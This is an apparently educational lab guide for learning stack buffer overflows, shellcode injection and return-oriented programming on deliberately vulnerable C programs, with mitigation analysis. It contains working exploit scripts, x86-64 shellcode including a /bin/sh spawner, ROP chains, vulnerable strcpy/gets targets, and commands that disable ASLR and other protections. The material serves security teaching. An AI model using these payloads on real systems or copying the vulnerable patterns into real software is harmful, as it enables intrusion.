Project 6: Attack Lab Workflow

Learn to defend by learning to attack: Build a controlled exploitation lab to master buffer overflows, code injection, and Return-Oriented Programming.


IMPORTANT: Safety and Ethics Disclaimer

This project is strictly for educational purposes in controlled, isolated environments.

This guide teaches exploitation techniques so you can:

  1. Understand vulnerabilities to write more secure code
  2. Recognize attack patterns in code review
  3. Appreciate why mitigations exist and how they work
  4. Prepare for security roles in software development

Legal and Ethical Boundaries:

  • ONLY practice on systems you own or have explicit written permission to test
  • NEVER use these techniques on production systems, networks, or other people's computers
  • Unauthorized computer access is a federal crime (CFAA in the US, similar laws worldwide)
  • Even "harmless" testing without permission is illegal and unethical
  • This knowledge comes with responsibility: use it to build better defenses

Recommended Environment:

  • Virtual machines (QEMU/VirtualBox) with no network access
  • Docker containers isolated from host
  • Purpose-built vulnerable applications (CMU Attack Lab, DVWA, etc.)
  • Systems with security mitigations explicitly disabled for learning

Quick Reference

| Attribute | Value |
|-----------|-------|
| Difficulty | Expert |
| Time Estimate | 2-3 weeks |
| Language | C (exploit development), Python (tooling) |
| Prerequisites | Projects 4 and 5 (Calling Convention + Bomb Lab) |
| Key Topics | Buffer overflows, shellcode, ROP, stack layout, mitigations |
| CS:APP Chapter | 3 (Machine-Level Representation of Programs) |

1. Learning Objectives

By completing this project, you will:

  1. Understand buffer overflow mechanics: Explain exactly how writing past buffer boundaries corrupts memory and hijacks control flow
  2. Map attack surfaces: Identify vulnerable code patterns and calculate exact overwrite distances
  3. Write shellcode: Create minimal machine code payloads that execute when injected
  4. Master ROP techniques: Chain existing code gadgets when code injection is blocked
  5. Reason about mitigations: Explain how ASLR, NX/DEP, stack canaries, and RELRO work and their limitations
  6. Think like an attacker to defend: Apply this knowledge to write secure code and conduct security reviews

2. Theoretical Foundation

2.1 The Buffer Overflow: Fundamental Mechanics

A buffer overflow occurs when a program writes data beyond the boundaries of a buffer, corrupting adjacent memory. On the stack, this can overwrite critical control data.

The Vulnerable Pattern

void vulnerable(char *input) {
    char buffer[64];      // Fixed-size buffer on stack
    strcpy(buffer, input); // No bounds checking!
    // If input is 64 bytes or longer, the copy (plus its NUL terminator) writes past buffer
}

Stack Layout During Function Call

When vulnerable() is called, the stack looks like this (x86-64; the stack grows downward, toward lower addresses):

High Addresses
+---------------------------+
|    Caller's Stack Frame   |
+---------------------------+
|     Return Address        |  <- What we want to overwrite!
+---------------------------+
|     Saved RBP             |  <- Previous frame pointer
+---------------------------+
|                           |
|       buffer[64]          |  <- Our buffer (64 bytes)
|                           |
+---------------------------+
|    [More local vars...]   |
+---------------------------+
Low Addresses (RSP points here)

The Overwrite Mechanics

Normal input ("Hello"):
+---------------------------+
| Return Address: 0x401234  |  <- Legitimate return
+---------------------------+
| Saved RBP: 0x7fff1000     |
+---------------------------+
| H | e | l | l | o | \0 |  |  <- buffer[64]
|   [rest of 64 bytes]      |
+---------------------------+

Overflow input (72+ bytes):
+---------------------------+
| Return Address: AAAAAAAA  |  <- OVERWRITTEN with 'AAAA...'
+---------------------------+
| Saved RBP: AAAAAAAA       |  <- OVERWRITTEN
+---------------------------+
| A | A | A | A | A | A | A |  <- buffer filled
| A | A | A | A | A | A | A |
|   [64 bytes of 'A']       |
+---------------------------+

When the function returns, it executes ret, which pops the return address and jumps there. If we've overwritten it with an address we control, we hijack execution.
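The overwrite can be modelled without touching a real process. The sketch below is a simulation only: it lays out a 64-byte buffer, a saved RBP, and a return address in a bytearray (low address first) and mimics an unchecked copy. The helper names and the two initial values are illustrative assumptions taken from the diagram above.

```python
import struct

BUF_SIZE = 64

def make_frame(saved_rbp: int, ret_addr: int) -> bytearray:
    """Model the frame low-to-high: buffer, saved RBP, return address."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", saved_rbp, ret_addr))

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimic strcpy: copy from the start of the buffer with no length check."""
    frame[0:len(data)] = data

def read_ret(frame: bytearray) -> int:
    """Read the 8-byte return address slot that sits above the saved RBP."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]

frame = make_frame(saved_rbp=0x7FFF1000, ret_addr=0x401234)
unchecked_copy(frame, b"Hello\x00")
intact = read_ret(frame)
print(hex(intact))                 # 0x401234

unchecked_copy(frame, b"A" * 80)   # 64 buffer + 8 saved RBP + 8 return address
smashed = read_ret(frame)
print(hex(smashed))                # 0x4141414141414141
```

Writing 72 bytes would clobber only the saved RBP; the return address changes once the copy reaches bytes 72 through 79.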

2.2 Calculating the Attack

Key measurements needed:

  1. Buffer location on stack: Where does our input land?
  2. Return address location: How far from buffer start to return address?
  3. Target address: Where do we want to redirect execution?

Finding the offset (using GDB):

# Pattern generation approach
$ python3 -c "print('A'*64 + 'B'*8 + 'C'*8 + 'D'*8)"
# Run under GDB, see what lands in return address

# Alternative: examine stack directly
(gdb) break vulnerable
(gdb) run < input.txt
(gdb) x/32xg $rsp    # Examine 32 quadwords from RSP
(gdb) print &buffer  # Get buffer address
(gdb) info frame     # See return address location
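The pattern approach can also be sketched with the standard library alone. The generator below produces an "Aa0Aa1Aa2..." style sequence, and the offset is whatever position the observed bytes occupy in it. The function names are hypothetical, and the observed value is simulated here rather than read from a debugger.

```python
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits

def make_pattern(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern, truncated to the requested length."""
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(out) >= length:
            break
        out += (upper + lower + digit).encode()
    return bytes(out[:length])

def find_offset(pattern: bytes, observed: bytes) -> int:
    """Return the position of the observed bytes in the pattern, or -1."""
    return pattern.find(observed)

pattern = make_pattern(200)
# Pretend these 8 bytes are what the debugger showed in the return address slot.
observed = pattern[72:80]
offset = find_offset(pattern, observed)
print(offset)   # 72
```

In a real session the observed bytes come from the crashed process (for example the quadword at the top of the stack when ret faults), and they appear in memory order, so no byte swapping is needed before searching.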

2.3 Code Injection Attacks

When the stack is executable (no NX bit), we can inject machine code directly:

Crafted payload:
+---------------------------+
| Address of buffer         |  <- Return address points to our shellcode
+---------------------------+
| AAAAAAAA (padding)        |  <- Saved RBP (doesn't matter)
+---------------------------+
|  \x48\x31\xc0...          |  <- Shellcode (our machine code)
|  [malicious instructions] |
|  [64 bytes of shellcode]  |
+---------------------------+

Minimal x86-64 shellcode examples:

; Exit with code 42 (minimal shellcode, 12 bytes)
mov eax, 60        ; syscall number for exit (x86-64)
mov edi, 42        ; exit code
syscall

; Bytes: 0xb8 0x3c 0x00 0x00 0x00 0xbf 0x2a 0x00 0x00 0x00 0x0f 0x05
; Note: this encoding contains NUL bytes, so strcpy would truncate it.

; Spawn /bin/sh (more realistic, ~30 bytes)
xor eax, eax          ; clear RAX so that "mov al" below yields exactly 59
xor rdx, rdx          ; envp = NULL
xor rsi, rsi          ; argv = NULL
mov rdi, 0x68732f6e69622f2f  ; "//bin/sh" stored little-endian
shr rdi, 8            ; drop the extra '/', leaving "/bin/sh" plus a NUL terminator
push rdi
mov rdi, rsp          ; rdi = pointer to "/bin/sh"
mov al, 59            ; syscall number for execve
syscall
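Whether a payload survives the copy depends on the input function: strcpy stops at the first NUL byte and gets stops at a newline. A small check like the following sketch reports where such bytes occur. It is applied to the exit(42) encoding listed above; the function name and the default set of bad bytes are assumptions for illustration.

```python
def bad_byte_offsets(payload: bytes, bad: bytes = b"\x00\n") -> list[int]:
    """Return the offsets of every byte in payload that appears in bad."""
    return [i for i, b in enumerate(payload) if b in bad]

# mov eax, 60 / mov edi, 42 / syscall
exit_42 = bytes.fromhex("b83c000000" "bf2a000000" "0f05")

offsets = bad_byte_offsets(exit_42)
print(len(exit_42))   # 12
print(offsets)        # [2, 3, 4, 7, 8, 9]
```

The six NUL bytes come from the 32-bit immediates, which is why constrained targets usually call for encodings built from shorter instructions.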

2.4 Return-to-libc and ROP

When the stack is non-executable (NX bit set), we can't inject code. Instead, we reuse existing code.

Return-to-libc

Jump to library functions already loaded in memory:

Crafted payload:
+---------------------------+
| Address of system()       |  <- Return to system()
+---------------------------+
| AAAAAAAA (padding)        |
+---------------------------+
| buffer contents...        |
+---------------------------+

# With proper setup, this calls system("/bin/sh")

Challenge: On x86-64, arguments are in registers (RDI, RSI, etc.), not stack. We need gadgets to load registers.

Return-Oriented Programming (ROP)

ROP chains together "gadgets" - small instruction sequences ending in ret:

Gadget: pop rdi; ret
        (found at address 0x401234)

Stack layout for ROP:
+---------------------------+
| addr of: ret              |  <- Chain continues...
+---------------------------+
| addr of: system()         |  <- Return here after pop rdi
+---------------------------+
| addr of: "/bin/sh"        |  <- Popped into RDI
+---------------------------+
| addr of: pop rdi; ret     |  <- First gadget
+---------------------------+
| padding...                |
+---------------------------+
| buffer...                 |
+---------------------------+

Execution flow:

  1. Function returns to pop rdi; ret gadget
  2. pop rdi loads "/bin/sh" address into RDI
  3. ret jumps to system()
  4. system() executes with RDI = "/bin/sh"
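The execution flow above can be traced with a toy interpreter. This sketch models only the stack pointer, RDI, and RIP, and understands a single gadget (pop rdi; ret). All three addresses are hypothetical placeholders, not values from any real binary.

```python
# Hypothetical addresses, chosen only for illustration.
POP_RDI_RET = 0x401234
BINSH_ADDR = 0x404040
SYSTEM_ADDR = 0x401050

def run_chain(stack: list[int]) -> dict:
    """Interpret a chain made of 'pop rdi; ret' gadgets and a final target."""
    regs = {"rdi": 0, "rip": 0}
    sp = 0
    regs["rip"] = stack[sp]        # the vulnerable function's ret pops slot 0
    sp += 1
    while regs["rip"] == POP_RDI_RET:
        regs["rdi"] = stack[sp]    # pop rdi
        sp += 1
        regs["rip"] = stack[sp]    # ret
        sp += 1
    return regs

# Lowest stack address first: this is the order in which the slots are consumed.
chain = [POP_RDI_RET, BINSH_ADDR, SYSTEM_ADDR]
regs = run_chain(chain)
print(hex(regs["rip"]), hex(regs["rdi"]))   # 0x401050 0x404040
```

The list is ordered from low to high addresses, which is the reverse of how the diagram above is drawn (high addresses at the top).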

2.5 Modern Mitigations

Stack Canaries

A random value placed between buffer and return address:

Stack with canary:
+---------------------------+
| Return Address            |
+---------------------------+
| Saved RBP                 |
+---------------------------+
| CANARY VALUE (random)     |  <- Checked before return
+---------------------------+
| buffer[64]                |
+---------------------------+

How it works:

  • Compiler inserts canary at function entry
  • Before return, checks if canary is unchanged
  • If modified, calls __stack_chk_fail() (aborts)
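The check can be illustrated with the same kind of byte-level model used for the stack frame. This is a simulation under stated assumptions: the canary is 8 bytes with a NUL low byte (as glibc does on x86-64 Linux), and the frame layout and helper names are illustrative.

```python
import secrets
import struct

BUF_SIZE = 64

def new_frame(canary: bytes) -> bytearray:
    """Low to high: buffer, canary, saved RBP, return address."""
    tail = struct.pack("<QQ", 0x7FFF1000, 0x401234)
    return bytearray(BUF_SIZE) + bytearray(canary) + bytearray(tail)

def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """Compare the stored canary against the reference copy before 'returning'."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + 8]) == canary

canary = b"\x00" + secrets.token_bytes(7)   # random, with a NUL low byte
frame = new_frame(canary)

frame[0:5] = b"Hello"                       # in-bounds write
ok_before = canary_intact(frame, canary)

frame[0:88] = b"A" * 88                     # linear overflow up to the return address
ok_after = canary_intact(frame, canary)
print(ok_before, ok_after)                  # True False
```

A linear overflow cannot reach the return address without first passing through the canary, which is why the check catches it; a write that skips over the canary would not be detected by this mechanism.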

Compile options:

gcc -fstack-protector        # Protect functions with large arrays
gcc -fstack-protector-all    # Protect all functions
gcc -fno-stack-protector     # Disable (for testing only!)

Limitations:

  • Only protects against sequential overwrites
  • Information leaks can reveal canary value
  • Format string attacks can read/bypass canary

NX/DEP (Non-Executable Stack)

Marks memory pages as either executable or writable, never both:

Virtual Memory with NX:
+---------------------------+
| Stack    [RW-]            |  <- Readable, Writable, NOT Executable
+---------------------------+
| Heap     [RW-]            |  <- Readable, Writable, NOT Executable
+---------------------------+
| Data     [RW-]            |  <- Readable, Writable, NOT Executable
+---------------------------+
| Code     [R-X]            |  <- Readable, NOT Writable, Executable
+---------------------------+

How it works:

  • Hardware enforces via page table NX bit
  • CPU faults if executing from non-executable page
  • Prevents direct code injection
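One way to confirm the policy for a given process is to scan its memory map for regions that are both writable and executable. The sketch below parses text in the /proc/<pid>/maps format; the sample lines are made up for illustration and the function name is hypothetical.

```python
def writable_and_executable(maps_text: str) -> list[str]:
    """Return the mapping lines whose permission field has both 'w' and 'x'."""
    hits = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and "w" in fields[1] and "x" in fields[1]:
            hits.append(line)
    return hits

# Illustrative sample in /proc/<pid>/maps format (addresses are made up).
SAMPLE = """\
00400000-00401000 r-xp 00000000 08:01 123 /lab/target2
00601000-00602000 rw-p 00001000 08:01 123 /lab/target2
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]
"""

hits = writable_and_executable(SAMPLE)
for line in hits:
    print(line)
```

On a live system the same function can be fed the contents of /proc/self/maps or the maps file of the target process; an empty result means no region violates the write-xor-execute rule.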

Compile/link options:

gcc -z noexecstack    # Enable NX (default on modern systems)
gcc -z execstack      # Disable NX (for testing only!)

Limitations:

  • Doesn't prevent code reuse attacks (ROP)
  • Doesn't protect against data-only attacks
  • JIT compilers need RWX pages (attack target)

ASLR (Address Space Layout Randomization)

Randomizes base addresses of stack, heap, libraries, and (optionally) executable:

Without ASLR (predictable):
  Stack: 0x7ffffffde000
  Heap:  0x555555756000
  libc:  0x7ffff7a00000

With ASLR (randomized each run):
  Run 1:
    Stack: 0x7ffcd4521000
    Heap:  0x55f8a3211000
    libc:  0x7f3c8a100000
  Run 2:
    Stack: 0x7ffc23987000
    Heap:  0x55b9c8765000
    libc:  0x7f1234500000

Types of ASLR:

| Component | Randomization | Enabled By |
|-----------|---------------|------------|
| Stack | Yes (default) | Kernel |
| Heap | Yes (default) | Kernel |
| Libraries | Yes (default) | Kernel |
| Executable (PIE) | Compile-time | -pie flag |

Check ASLR status:

cat /proc/sys/kernel/randomize_va_space
# 0 = disabled
# 1 = partial (stack, mmap base and shared libraries, vDSO; code of PIE binaries)
# 2 = full (everything in mode 1 plus the brk-based heap)

# Disable temporarily (requires root, testing only!)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
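For journal entries it helps to record the setting programmatically. The following sketch reads the same file and maps the value to a label; the function names and the label wording are assumptions, and the file only exists on Linux.

```python
from pathlib import Path

ASLR_LABELS = {
    "0": "disabled",
    "1": "partial randomization",
    "2": "full randomization",
}

def describe_aslr(raw: str) -> str:
    """Map the raw file contents to a human-readable label."""
    return ASLR_LABELS.get(raw.strip(), "unknown value")

def current_aslr(path: str = "/proc/sys/kernel/randomize_va_space") -> str:
    """Read the setting if the file exists, otherwise say so."""
    p = Path(path)
    return describe_aslr(p.read_text()) if p.exists() else "not available on this system"

print(current_aslr())
```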

Limitations:

  • Information leaks reveal addresses
  • Brute force may be viable on 32-bit (only 8-16 bits of entropy)
  • Some addresses partially predictable (page alignment)
  • Return-to-PLT attacks work without knowing libc base
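The brute-force point is easy to quantify. Assuming the layout is re-randomized on every attempt, so that guesses are independent, the chance of at least one hit in k tries with n bits of entropy is 1 - (1 - 2^-n)^k. The sketch below evaluates this; the 28-bit figure is only an illustrative value for a 64-bit target.

```python
def success_probability(entropy_bits: int, attempts: int) -> float:
    """Chance that at least one of `attempts` independent guesses is right."""
    p_single = 1 / (2 ** entropy_bits)
    return 1 - (1 - p_single) ** attempts

for bits in (8, 16, 28):
    print(bits, f"{success_probability(bits, 1000):.6f}")
```

With 8 bits a thousand attempts almost always succeed, while the probability drops to roughly one or two percent at 16 bits and becomes negligible at 28.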

RELRO (Relocation Read-Only)

Protects the Global Offset Table (GOT) from overwriting:

Partial RELRO (default):
  - Some GOT entries marked read-only after relocation
  - Lazy binding still works (some entries writable)

Full RELRO:
  - All GOT entries resolved at load time
  - Entire GOT marked read-only
  - No lazy binding

Compile options:

gcc -Wl,-z,relro        # Partial RELRO (default)
gcc -Wl,-z,relro,-z,now # Full RELRO

Limitations:

  • Full RELRO increases startup time
  • Doesn't protect other writable memory
  • Other attack targets exist (malloc hooks, function pointers)

2.6 Attack Taxonomy

                        Buffer Overflow Attacks
                                  │
         ┌────────────────────────┼────────────────────────┐
         │                        │                        │
   Code Injection            Code Reuse             Data-Only
   (needs RWX stack)     (bypasses NX/DEP)          Attacks
         │                        │                        │
         │              ┌─────────┼─────────┐              │
         │              │         │         │              │
         │         ret2libc      ROP    JOP/COP            │
         │                        │                        │
         │              ┌─────────┼─────────┐              │
         │              │         │         │              │
         │          Basic ROP  Sigreturn   SROP            │
         │                       ROP                       │
         │                                                 │
    Mitigated by:           Mitigated by:           Harder to
    - NX/DEP                - ASLR + PIE            mitigate
    - Stack Canaries        - Stack Canaries        (CFI helps)
                            - CFG/CFI

2.7 Why This Matters for Defense

Understanding attacks enables:

  1. Secure coding practices
    • Prefer bounds-checked functions (snprintf or fgets rather than strcpy or gets; note that strncpy does not guarantee NUL termination)
    • Validate all input lengths
    • Use safe string libraries
  2. Code review for vulnerabilities
    • Recognize dangerous patterns
    • Estimate exploitability
    • Prioritize security fixes
  3. Proper mitigation deployment
    • Enable all compiler protections
    • Understand what each protects against
    • Know the limitations
  4. Incident response
    • Recognize exploitation attempts
    • Understand attack impact
    • Develop containment strategies

3. Project Specification

3.1 What You Will Build

A controlled "Attack Lab" environment consisting of:

  1. Vulnerable target programs with intentional security flaws
  2. An exploitation journal documenting your attacks
  3. Proof-of-concept exploits for code injection and ROP
  4. Mitigation analysis showing how each defense affects your attacks

3.2 Functional Requirements

Part 1: Code Injection Attacks

  1. Target 1: Basic Stack Smash
    • Overflow a buffer to redirect execution
    • Call a function that was never intended to be called
    • Document: exact offset, payload structure, why it works
  2. Target 2: Shellcode Injection
    • Inject executable machine code
    • Execute code that performs a visible action (print, file create, etc.)
    • Document: shellcode bytes, how NX is disabled, return address calculation
  3. Target 3: Return Address Overwrite with Constraints
    • Overcome input filtering (e.g., no null bytes, limited character set)
    • Document: how constraints were handled, encoding techniques

Part 2: Return-Oriented Programming

  1. Target 4: Basic ROP Chain
    • With NX enabled, chain gadgets to call a function
    • Document: gadget discovery, chain construction, register setup
  2. Target 5: Multi-Gadget ROP
    • Construct a longer chain performing multiple operations
    • Example: set up registers, call execve equivalent
    • Document: complete chain with annotations

Part 3: Mitigation Analysis

  1. Experiment 1: Stack Canaries
    • Attempt attack with canaries enabled
    • Document crash, canary detection mechanism
    • Discuss bypass techniques (information leak scenarios)
  2. Experiment 2: ASLR
    • Attempt attack with ASLR enabled
    • Document failure mode
    • Discuss bypass techniques (brute force, leaks, ret2plt)
  3. Experiment 3: Full Mitigations
    • Attempt attack with all mitigations
    • Document cumulative defense effect
    • Identify which attacks remain viable

3.3 Non-Functional Requirements

  • Isolation: All work in VM or container with no network
  • Reproducibility: Document all environment setup
  • Evidence-based: Every claim backed by memory dumps, addresses, GDB output
  • Educational focus: Emphasis on understanding, not just "making it work"

3.4 Example Exploitation Journal Entry

Attack #2: Shellcode Injection on Target 2

Environment

  • Ubuntu 22.04 x86-64 in VirtualBox (no network)
  • ASLR disabled: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
  • Compiled: gcc -g -fno-stack-protector -z execstack -o target2 target2.c

Vulnerability Analysis

Target function:

void process_input(char *data) {
    char buffer[128];
    strcpy(buffer, data);  // No bounds check
    printf("Processed: %s\n", buffer);
}

Stack layout (from GDB):

(gdb) break process_input
(gdb) run <<< $(python3 -c "print('A'*200)")
(gdb) next
(gdb) x/64xg $rsp

0x7fffffffdc00: 0x4141414141414141  0x4141414141414141  <- buffer starts
...
0x7fffffffdc78: 0x4141414141414141  0x4141414141414141
0x7fffffffdc88: 0x4141414141414141  <- saved RBP (overwritten)
0x7fffffffdc90: 0x4141414141414141  <- return address (overwritten)

Offset calculation:

  • buffer @ 0x7fffffffdc00
  • return address @ 0x7fffffffdc90
  • Offset = 0x7fffffffdc90 - 0x7fffffffdc00 = 0x90 = 144 bytes (128-byte buffer + 8 bytes of padding + 8-byte saved RBP)
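The arithmetic is worth checking mechanically before building a payload. This short sketch subtracts the addresses read from the dump above; the variable names are illustrative.

```python
buffer_addr = 0x7FFFFFFFDC00      # start of buffer
saved_rbp_addr = 0x7FFFFFFFDC88   # saved RBP slot
ret_slot_addr = 0x7FFFFFFFDC90    # return address slot

offset_to_rbp = saved_rbp_addr - buffer_addr
offset_to_ret = ret_slot_addr - buffer_addr
print(offset_to_rbp, offset_to_ret, hex(offset_to_ret))   # 136 144 0x90
```

The payload therefore needs 144 filler bytes (136 up to the saved RBP, then 8 over it) before the 8 bytes that replace the return address.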

Shellcode Development

Goal: Print "PWNED" to stdout

; write(1, "PWNED\n", 6)
section .text
global _start
_start:
    mov eax, 1          ; syscall: write
    mov edi, 1          ; fd: stdout
    lea rsi, [rel msg]  ; buffer pointer
    mov edx, 6          ; length
    syscall

    mov eax, 60         ; syscall: exit
    xor edi, edi        ; status: 0
    syscall

msg: db "PWNED", 10

Assembled bytes (39 bytes: 33 bytes of code followed by the 6-byte message):

\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x48\x8d\x35\x10\x00\x00\x00
\xba\x06\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\x31\xff\x0f\x05
PWNED\n

Payload Construction

[Shellcode: 39 bytes][NOP padding: 97 bytes][Saved RBP: 8 bytes][Return: buffer addr]

Python payload generator:

import struct
import sys

shellcode = b"\xb8\x01\x00\x00\x00..."  # 39 bytes
nop_pad = b"\x90" * (136 - len(shellcode))  # Pad to 136 bytes (start of saved RBP)
saved_rbp = b"BBBBBBBB"                # 8 bytes (overwrites, ignored)
ret_addr = struct.pack("<Q", 0x7fffffffdc00)  # Points to shellcode

payload = shellcode + nop_pad + saved_rbp + ret_addr
sys.stdout.buffer.write(payload)       # Raw bytes; print() would emit the b'...' repr

Execution Evidence

$ python3 exploit.py | ./target2
PWNED
Segmentation fault (core dumped)  # Expected: shellcode doesn't return cleanly

GDB verification:

(gdb) x/5i 0x7fffffffdc00
   0x7fffffffdc00: mov    eax,0x1
   0x7fffffffdc05: mov    edi,0x1
   ...
(gdb) continue
PWNED

Why It Worked

  1. No bounds checking: strcpy copied entire input without limit
  2. Executable stack: -z execstack disabled NX protection
  3. No ASLR: Stack address predictable across runs
  4. No canary: -fno-stack-protector disabled stack protection

Mitigation Impact

If we enable NX (-z noexecstack):

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffdc00 in ?? ()

CPU faults when trying to execute from stack (non-executable page).

Solution: Use ROP instead of code injection (see Attack #4).


4. Solution Architecture

4.1 Lab Environment Structure

attack-lab/
├── environment/
│   ├── Dockerfile              # Isolated container setup
│   ├── setup.sh                # Disable mitigations for testing
│   └── reset.sh                # Re-enable mitigations
├── targets/
│   ├── target1/                # Basic overflow
│   │   ├── target1.c
│   │   ├── Makefile
│   │   └── README.md
│   ├── target2/                # Code injection
│   ├── target3/                # Constrained input
│   ├── target4/                # Basic ROP
│   └── target5/                # Advanced ROP
├── tools/
│   ├── gadget_finder.py        # Find ROP gadgets
│   ├── payload_builder.py      # Construct exploits
│   ├── pattern_gen.py          # Offset calculation
│   └── shellcode_gen.py        # Shellcode utilities
├── exploits/
│   ├── exploit1.py
│   ├── exploit2.py
│   ├── exploit3.py
│   ├── exploit4.py
│   └── exploit5.py
├── journal/
│   ├── attack1-basic-overflow.md
│   ├── attack2-shellcode.md
│   ├── attack3-constrained.md
│   ├── attack4-basic-rop.md
│   ├── attack5-advanced-rop.md
│   └── mitigation-analysis.md
└── README.md


4.2 Key Components

| Component | Purpose | Key Considerations |
|-----------|---------|-------------------|
| Target Programs | Intentionally vulnerable binaries | Multiple difficulty levels |
| Exploit Scripts | Automated payload generation | Reproducible, documented |
| Gadget Finder | Locate ROP gadgets | Works on ELF binaries |
| Pattern Generator | Calculate exact offsets | De Bruijn sequences |
| Journal Entries | Document everything | Evidence-based |

4.3 Target Program Designs

Target 1: Basic Stack Smash

#include <stdio.h>
#include <string.h>

void win() {
    printf("You called win()! Attack successful.\n");
}

void vulnerable(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable(argv[1]);
    printf("Normal return from main()\n");
    return 0;
}

Target 2: Shellcode Execution

#include <stdio.h>
#include <string.h>

void vulnerable() {
    char buffer[128];
    printf("Enter input: ");
    gets(buffer);  // Extremely dangerous!
    printf("You entered: %s\n", buffer);
}

int main() {
    printf("Shellcode injection target\n");
    vulnerable();
    return 0;
}

Target 4: ROP-Friendly

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// These functions provide gadgets
void setup_rdi(long val) { asm("pop %rdi; ret"); }
void setup_rsi(long val) { asm("pop %rsi; ret"); }

void win_with_args(long a, long b) {
    if (a == 0xdeadbeef && b == 0xcafebabe) {
        printf("ROP chain successful!\n");
        printf("a = 0x%lx, b = 0x%lx\n", a, b);
    }
}

void vulnerable() {
    char buffer[64];
    printf("Input: ");
    gets(buffer);
}

int main() {
    vulnerable();
    return 0;
}

5. Implementation Guide

5.1 Development Environment Setup

Option A: Docker (Recommended)

# Dockerfile
FROM ubuntu:22.04

RUN apt-get update && apt-get install -y \
    gcc \
    gdb \
    python3 \
    python3-pip \
    nasm \
    binutils \
    vim \
    && rm -rf /var/lib/apt/lists/*

# Install pwntools (powerful exploit development library)
RUN pip3 install pwntools

# ASLR is a host-kernel setting, so it cannot be changed at image build time.
# Disable it per process at run time instead, e.g.:
#   setarch "$(uname -m)" -R ./target1

WORKDIR /lab
COPY . /lab

CMD ["/bin/bash"]

# Build and run
docker build -t attack-lab .
docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined attack-lab

Option B: Virtual Machine

# In VM with root access
# Disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

# Install tools
sudo apt install gcc gdb python3 python3-pip nasm binutils
pip3 install pwntools

# Verify setup
cat /proc/sys/kernel/randomize_va_space  # Should print 0

5.2 Implementation Phases

Phase 1: Environment and Basic Overflow (Days 1-4)

Goals:

  • Set up isolated environment
  • Build and test Target 1
  • Achieve first successful attack

Tasks:

  1. Create Docker/VM environment
  2. Write Target 1 (target1.c)
  3. Compile without protections:
    gcc -g -fno-stack-protector -z execstack -no-pie -o target1 target1.c
    
  4. Find offset using pattern:
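    # pattern_gen.py
    import sys
    from pwn import *
    sys.stdout.buffer.write(cyclic(200, n=8))  # raw bytes, 8-byte windows for x86-64
    
  5. Craft first exploit:
    # exploit1.py
    import sys
    from pwn import *
    
    offset = 72  # Found via pattern
    win_addr = 0x401156  # Found via: nm target1 | grep win
    
    payload = b"A" * offset
    payload += p64(win_addr)
    
    sys.stdout.buffer.write(payload)  # print() would emit the b'...' repr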
    
  6. Document in journal

Checkpoint: ./target1 $(python3 exploit1.py) prints "You called win()! Attack successful."

Phase 2: Shellcode Development (Days 5-8)

Goals:

  • Write and test shellcode
  • Inject and execute in Target 2
  • Handle input constraints

Tasks:

  1. Write minimal shellcode in NASM:
    ; shellcode.asm
    BITS 64
    global _start
    
    _start:
        ; write(1, msg, 6)
        mov rax, 1
        mov rdi, 1
        lea rsi, [rel msg]
        mov rdx, 6
        syscall
    
        ; exit(0)
        mov rax, 60
        xor rdi, rdi
        syscall
    
    msg: db "PWNED", 10
    
  2. Assemble and extract bytes:
    nasm -f bin shellcode.asm -o shellcode.bin
    xxd -i shellcode.bin
    
  3. Test shellcode standalone:
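    // test_shellcode.c
    #include <string.h>
    #include <sys/mman.h>
    
    unsigned char shellcode[] = { 0x48, 0xc7, ... };
    
    int main(void) {
        // Copy into an RWX mapping: on recent kernels -z execstack no longer
        // makes the data segment executable, so calling the array directly faults.
        void *mem = mmap(NULL, sizeof shellcode, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (mem == MAP_FAILED) return 1;
        memcpy(mem, shellcode, sizeof shellcode);
        ((void (*)(void))mem)();
        return 0;
    }
    
    gcc -o test_shellcode test_shellcode.c
    ./test_shellcode  # Should print "PWNED"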
    
  4. Build complete exploit for Target 2

  5. Handle Target 3 constraints (if applicable):
    • Alphanumeric shellcode
    • Avoid null bytes
    • Character set restrictions

Checkpoint: Target 2 prints "PWNED" from injected code

Phase 3: Return-Oriented Programming (Days 9-14)

Goals:

  • Find gadgets in binaries
  • Build ROP chains
  • Execute complex attacks without code injection

Tasks:

  1. Install gadget finder:
    pip3 install ropper
    # Or use ROPgadget
    pip3 install ROPgadget
    
  2. Find gadgets in Target 4:
    ropper --file target4 --search "pop rdi"
    ROPgadget --binary target4 | grep "pop rdi"
    
  3. Build basic ROP chain:
    import sys
    from pwn import *
    
    # Gadget addresses from ropper (placeholders; use the values from your binary)
    pop_rdi = 0x401234
    pop_rsi = 0x401236
    win_with_args = 0x401300
    
    payload = b"A" * 72  # Padding to return address
    
    # ROP chain
    payload += p64(pop_rdi)
    payload += p64(0xdeadbeef)  # First argument
    payload += p64(pop_rsi)
    payload += p64(0xcafebabe)  # Second argument
    payload += p64(win_with_args)
    
    sys.stdout.buffer.write(payload + b"\n")  # Raw bytes; gets() reads up to the newline
    
  4. Develop more complex chains for Target 5

  5. Document gadget discovery and chain logic
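At its core, gadget discovery is a byte search: pop rdi; ret encodes as 5f c3, and any occurrence of those two bytes in executable memory is usable even if it sits in the middle of another instruction. The sketch below shows that idea on synthetic bytes. It is not how ropper or ROPgadget are implemented (they disassemble and filter), and the base address is made up.

```python
def find_byte_sequence(code: bytes, needle: bytes, base: int = 0) -> list[int]:
    """Return base-relative addresses of every occurrence of needle in code."""
    hits = []
    start = 0
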